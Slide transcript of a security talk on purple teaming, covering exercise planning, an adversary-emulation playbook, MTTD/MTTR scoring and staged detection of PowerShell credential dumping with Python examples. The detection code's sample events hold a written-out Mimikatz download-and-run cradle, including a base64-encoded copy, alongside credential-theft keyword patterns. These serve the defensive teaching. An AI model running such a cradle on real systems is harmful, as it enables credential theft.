Purple Team: Red and Blue Teams, a Love-Hate Relationship (紅藍隊的相愛相殺)
TRANSCRIPT
奧義智慧 Proprietary and Confidential Information
Who Am I
►Shang-De Jiang (@SecurityThunder)
►Cyber Security Researcher @ 奧義智慧
►Speaker at HITCON and Black Hat USA (2020)
►UCCU Hacker Co-Founder
►Private cyber security group in Taiwan
奧義智慧 @ MITRE ATT&CK Evaluation
CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round
BAD PYRAMID
https://danielmiessler.com/blog/the-definition-green-team-how-different-red-team/
Maturity Level (ref: Bryson Bort, SCYTHE)
1. Vulnerability Management
2. Penetration Testing
3. Blind/Internal Red Team
4. In-Person/Continuous Purple Team
The Team Conflict of Red & Blue
►Red Team (KPI: find security issues)
  ►Troublemaker
  ►Security flaw
  ►Impacts blue team performance
►Blue Team (KPI: fewer security issues)
  ►Old-school
  ►Conservative
  ►Never patches the vuln
Credit: Robert Couse-Baker
Purple Team: Improve Security Posture
(Diagram of blue team functions: Access Control, Security Monitoring, Incident Response, Help Desk; and red team functions: Exploit Development, Penetration Testing, Social Engineering, Vulnerability Scanning.)
The reason why you need a purple team
►Improve MTTD (mean time to detect)
►Improve MTTR (mean time to respond)
►Benefits the organization's security monitoring maturity, whatever its current level
►A guide to identifying the organization's current gaps, even if it already runs red team assessments
Build Your Purple Team
Preparation
►Objectives
  ►Determine testing scope and target
►Blue & red team member selection
  ►Ensure that representatives from each aspect of the blue team are involved
  ►Red team members need relevant experience
►Referee
  ►Communication bridge between the attack and defense teams
Planning - map your attack surface
The real threat behind the incident (example: the Garmin ransomware outage)
https://www.inside.com.tw/article/20479-garmin-outage-ransomware-sources
Planning - design attack scenario
►Emulate real incidents the organization or its industry has experienced
►Review historical red team exercises
►Increase attack complexity gradually:
  1. Common tools and penetration testing frameworks
  2. Evasion (make the attack evade detection)
  3. Custom tooling
Execution: Adversary Emulation
CALDERA
►Automated adversary emulation
►End-to-end: from initial access to data exfiltration
►Repeatable: improvement can be measured over time
Playbook
►APT3, APT29 (https://attackevals.mitre.org)
►Dogeza
Role        Software and Environment       IP Address
Red Team    Kali 4.15.0, MS15-015          172.16.40.225
Blue Team   Xensor, CyCraft, CyberTotal    172.16.40.230, 172.16.40.231
Victim A    Linux Ubuntu 16.04             172.16.40.232
Victim B    Windows Server 2012 R2         172.16.40.226
Victim C    Windows 10 (1607) English      172.16.40.227
(Network diagram: Blue Team, Red Team, Victim Win Desktop, Victim Linux with Apache)
Dogeza Playbook Scenario
Dogeza Red-Blue Team Steps
►Part I – Setup & Linux Red Team Steps
Step  Procedure
1     Blue Team deploys software on Victim A, B and C
2     Red Team uses a web exploit to attack Victim A
3     Red Team escalates privileges on Victim A
4     Red Team implants a forged ssh key for persistence
5     Red Team installs a kernel rootkit and hides a process on Victim A
6     Red Team constructs a tunnel to reach internal Victim B
8     Red Team exploits Victim B via the tunnel to implant a webshell (skipped, duplicate of step 3)
9     Red Team launches the webshell on Victim B
10    Red Team obtains privileges and credentials on Victim B
11    Red Team moves laterally to Victim C
12    Red Team collects sensitive documents and deploys a backdoor on Victim C
13    Blue Team generates the investigation report
Review
Review testing results
►Roundtable meeting: do not just wait for the final report
►Deep-dive the technique
►Let attacker and defender sit together and study the attack
►Review findings and the new plan: open Q&A time for the red and blue teams; share findings, detections and mitigation plans
Measure Performance
►Before vs. after
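One way to put numbers on the before/after comparison, as an added example (my code, not the speaker's method or CyCraft tooling). The step names follow the Dogeza playbook above; every timestamp and both rounds' outcomes are constructed to illustrate the calculation and are not measured results. MTTD is taken from the attack step to the first alert and MTTR from the first alert to confirmed containment; that definition is an assumption, the point is to fix one and keep it across rounds. Steps that were never detected are excluded from the means but reported as coverage gaps, because an MTTD computed only over detected steps looks better the more steps are missed.

```python
"""Before/after scoring of a purple team round: MTTD, MTTR and detection coverage.

Added example for this page; not the speaker's tooling. Step names follow the Dogeza
playbook; every timestamp and both rounds' outcomes are constructed for illustration.
"""
from datetime import datetime
from statistics import mean

D1, D2 = "2020-08-03T", "2020-08-04T"  # constructed exercise dates

# Red-team steps of the playbook and when each was executed (constructed times).
STEPS = ["web exploit on Victim A", "privilege escalation on Victim A",
         "forged ssh key persistence", "kernel rootkit hides process",
         "tunnel to Victim B", "credentials of Victim B", "lateral movement to Victim C"]
ATTACK = [D1 + "09:00", D1 + "09:20", D1 + "09:35", D1 + "10:00",
          D1 + "10:30", D1 + "11:00", D1 + "11:30"]

# Per step: (first alert raised, containment confirmed); None means it never happened.
BEFORE = [(D1 + "11:30", D2 + "07:30"), (None, None), (None, None), (None, None),
          (D1 + "14:30", D2 + "10:30"), (None, None), (D1 + "17:00", D2 + "13:00")]
AFTER = [(D1 + "09:12", D1 + "09:42"), (D1 + "09:28", D1 + "09:58"),
         (D1 + "09:50", D1 + "10:20"), (None, None), (D1 + "10:35", D1 + "11:05"),
         (D1 + "11:20", D1 + "12:50"), (D1 + "11:42", D1 + "12:42")]


def minutes(start, end):
    """Elapsed minutes between two ISO timestamps."""
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 60


def score(outcomes):
    """MTTD (attack -> first alert), MTTR (first alert -> containment) and coverage.

    Steps that were never detected are excluded from the means but listed as gaps:
    a mean over detected steps alone improves when more steps are missed, so the
    two numbers must always be read together.
    """
    ttd, ttr, missed = [], [], []
    for step, attack, (detected, responded) in zip(STEPS, ATTACK, outcomes):
        if detected is None:
            missed.append(step)
            continue
        ttd.append(minutes(attack, detected))
        if responded is not None:
            ttr.append(minutes(detected, responded))
    return {
        "coverage": (len(STEPS) - len(missed)) / len(STEPS),
        "missed": missed,
        "mttd_min": mean(ttd) if ttd else None,
        "mttr_min": mean(ttr) if ttr else None,
    }


def compare(before, after):
    """Deltas between two rounds; None where a round has no value to compare."""
    b, a = score(before), score(after)
    delta = {}
    for key in ("mttd_min", "mttr_min", "coverage"):
        delta[key] = None if b[key] is None or a[key] is None else a[key] - b[key]
    delta["closed_gaps"] = sorted(set(b["missed"]) - set(a["missed"]))
    delta["open_gaps"] = a["missed"]
    return delta


if __name__ == "__main__":
    for name, outcomes in (("before", BEFORE), ("after", AFTER)):
        print(name, score(outcomes))
    print("delta", compare(BEFORE, AFTER))
```

In the constructed data the second round brings MTTD from 240 to 12 minutes and MTTR from 1200 to 45 minutes, but the kernel rootkit step is still undetected; reporting that open gap next to the means is what keeps the "after" number honest.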
Blue Team Evolution
Detect target – PowerShell OS credential dumping
• ATT&CK evaluation – APT29 step 6.C.1, PowerShell Dump OS credential
The attack methods we want to detect:
►PowerShell downloading a remote script
►OS credential dumping via PowerShell
1. Detect from the command line
2. Detect from the libraries loaded by the process
3. Check the PowerShell event log
   • EventID 4104 (script block logging)
   • EventID 4103 (module logging)
4. Check called APIs
   ►PowerShell calls .NET libraries; if you can hook all APIs, you know PowerShell's behavior.
Detection stages
Stage 1 – Process command-line parameters: detect powershell.exe with a command line containing Invoke-Mimikatz
Stage 2 – Loaded DLLs: detect powershell.exe loading libraries used for credential dumping; the slide lists Crypt32.dll, User32.dll and Advapi32.dll (these are loaded by most Windows processes, so this signal needs corroboration from the other stages)
Stage 3 – Windows Event Log: log Windows events 4104 and 4103
Stage 4 – API monitoring: monitor PowerShell calling OpenProcess to access lsass process memory
Stage 5 – AMSI: use the AMSI module to log every PowerShell event
Data Sources Evolution
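The staged detections above, worked through as an added example (my code, not the speaker's or CyCraft's tooling). It runs stages 1, 3 and 4 over constructed sample events: a plain Invoke-Mimikatz command line, the same payload hidden behind -EncodedCommand, the 4104 script block record for that run, and a process-access record of powershell.exe opening lsass.exe. The event field names, PIDs, the 192.0.2.10 address and the keyword list are assumptions for illustration. The first pass matches the raw command line only and misses the encoded run; the second pass base64/UTF-16LE decodes the -EncodedCommand payload before matching, which is the check a stage-1 rule needs so that it is not trivially evaded. Stage 3 catches the encoded run either way, because script block logging records the script PowerShell actually executed.

```python
"""Staged detection of PowerShell credential dumping over constructed sample events.

Added example for this page; not the speaker's code or CyCraft tooling. Event shapes,
field names, PIDs and addresses are constructed. Real data would come from process
creation logs (Security 4688 / Sysmon 1), PowerShell Operational 4104 (script block
logging) and a process-access monitor such as Sysmon 10.
"""
import base64
import re

# Hypothetical rule set: strings typical of in-memory credential dumping and download cradles.
CRED_DUMP = re.compile(r"invoke-mimikatz|sekurlsa|dumpcreds|minidump|comsvcs\.dll|lsass", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; common spellings listed here.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent or not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def stage1_cmdline(event, decode_encoded=False):
    """Stage 1: keyword match on the command line, optionally after decoding -enc."""
    if event["type"] != "process_create" or event["image"].lower() != "powershell.exe":
        return None
    text = event["cmdline"]
    if decode_encoded:
        text += " " + decode_encoded_command(text)
    hits = {h.lower() for h in CRED_DUMP.findall(text)}
    if not hits:
        return None
    cradle = {h.lower() for h in CRADLE.findall(text)}
    return {"stage": 1, "event": event["id"], "indicators": sorted(hits | cradle)}


def stage3_scriptblock(event):
    """Stage 3: 4104 carries the script PowerShell ran, so encoding the command line does not hide it."""
    if event["type"] != "ps_4104":
        return None
    hits = {h.lower() for h in CRED_DUMP.findall(event["script_block"])}
    return {"stage": 3, "event": event["id"], "indicators": sorted(hits)} if hits else None


def stage4_lsass_access(event):
    """Stage 4: a process opened lsass.exe with a handle that allows reading its memory."""
    if event["type"] != "process_access" or event["target"].lower() != "lsass.exe":
        return None
    if event["granted_access"] & PROCESS_VM_READ:
        return {"stage": 4, "event": event["id"],
                "indicators": [f"{event['image']} -> lsass.exe 0x{event['granted_access']:X}"]}
    return None


def run_detections(events, decode_encoded=False):
    """Apply every stage to every event and return the list of alerts."""
    rules = (lambda e: stage1_cmdline(e, decode_encoded), stage3_scriptblock, stage4_lsass_access)
    return [alert for ev in events for rule in rules if (alert := rule(ev))]


# Constructed sample events (not real logs).
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-Mimikatz.ps1'); "
           "Invoke-Mimikatz -DumpCreds")
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "pid": 4412, "image": "powershell.exe",
     "cmdline": f'powershell.exe -nop -w hidden -c "{PAYLOAD}"'},
    # Same payload behind -EncodedCommand: a raw keyword match on the command line misses it.
    {"id": 2, "type": "process_create", "pid": 5120, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(PAYLOAD)},
    # Script block logging for the encoded run: 4104 holds the decoded script.
    {"id": 3, "type": "ps_4104", "pid": 5120, "script_block": PAYLOAD},
    # The same process opening lsass.exe with PROCESS_ALL_ACCESS.
    {"id": 4, "type": "process_access", "pid": 5120, "image": "powershell.exe",
     "target": "lsass.exe", "granted_access": 0x1FFFFF},
    # Benign admin script; -ExecutionPolicy must not be mistaken for -EncodedCommand.
    {"id": 5, "type": "process_create", "pid": 6001, "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\inventory.ps1"},
    # Benign handle to lsass.exe that cannot read memory (PROCESS_QUERY_LIMITED_INFORMATION).
    {"id": 6, "type": "process_access", "pid": 900, "image": "taskmgr.exe",
     "target": "lsass.exe", "granted_access": 0x1000},
]

if __name__ == "__main__":
    for label, decode in (("command line only", False), ("command line + decoded -enc", True)):
        print(f"== {label} ==")
        for a in run_detections(SAMPLE_EVENTS, decode_encoded=decode):
            print(f"stage {a['stage']} event {a['event']}: {', '.join(a['indicators'])}")
```

Stages 2 and 5 are not modelled because they depend on image-load and AMSI telemetry the page does not show. The stage-4 check keys on PROCESS_VM_READ rather than on any handle to lsass.exe, since query-only handles from legitimate tooling would otherwise flood the alert queue.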
Implement Mitigation
1. Credential Access Protection: use capabilities to prevent successful credential access by adversaries, including blocking forms of credential dumping, e.g. Credential Guard
2. Privileged Account Management: manage the creation, modification, use, and permissions associated with privileged accounts, including SYSTEM and root. Restrict the PowerShell execution policy to administrators (the execution policy is not a security boundary and can be bypassed, e.g. with -ExecutionPolicy Bypass, so pair it with the controls below)
3. Execution Prevention: block execution of code on a system through application control and/or script blocking, e.g. AppLocker
4. PowerShell Constrained Language mode: permits all cmdlets and all PowerShell language elements, but limits the permitted types
Ref: https://attack.mitre.org/
Ref: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes
KEY TAKEAWAYS
1. Have a purple team to make your security teams work together
2. A purple team is not a replacement for a red team
3. Security is not just buying more products; the exercise is also important
4. Identify the security gaps and implement detection/mitigation
Q&A Time